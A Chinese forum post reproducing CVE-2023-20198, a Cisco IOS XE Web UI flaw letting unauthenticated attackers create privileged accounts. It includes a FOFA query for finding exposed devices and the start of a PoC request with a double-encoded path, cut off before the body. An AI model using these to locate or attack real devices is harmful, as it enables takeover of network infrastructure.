首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
SAAS
ToB门户
了解全球最新的ToB事件
论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
微博
Follow
记录
Doing
博客
Blog
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
排行榜
Ranklist
相册
Album
应用中心
qidao123.com ToB IT社区-企服评测·应用市场
»
论坛
›
软件与程序人生
›
移动端开发
›
IOS
›
Cisco IOS XE Web UI 权限提升毛病复现(CVE-2023-20198) ...
返回列表
发新帖
Cisco IOS XE Web UI 权限提升毛病复现(CVE-2023-20198)
[复制链接]
发表于 2024-8-2 01:29:22
|
显示全部楼层
|
阅读模式
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
×
0x01 产品简介
Web UI 是一种基于GUI的嵌入式体系管理工具,可以或许提供体系设置、简化体系摆设和可管理性以及加强用户体验。它带有默认映像,因此无需在体系上启用任何内容或安装任何许可证。Web UI 可用于构建设置以及
监控
体系和排除体系故障,而无需CLI专业知识。
0x02 毛病概述
当Cisco IOS XE 软件的web UI袒露于互联网或不受信托的网络时,未经身份验证的远程攻击者可以利用该毛病在受影响的体系上创建具有15级访问权限的帐户。攻击者可以利用该帐户来控制受影响的体系。
利用条件
:
需要启用HTTP Server大概HTTPS Server。
0x03 影响范围
启用了Web UI
功能
的Cisco IOS XE
0x04 复现情况
FOFA:
body="<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>"
复制
代码
0x05 毛病复现
PoC
POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Type: application/x-www-form-urlencod
复制
代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复
使用道具
举报
返回列表
浏览过的版块
终端安全
王柳
+ 我要发帖
登录后关闭弹窗
登录参与点评抽奖 加入IT实名职场社区
去登录
微信订阅号
微信服务号
微信客服(加群)
H5
小程序
快速回复
返回顶部
返回列表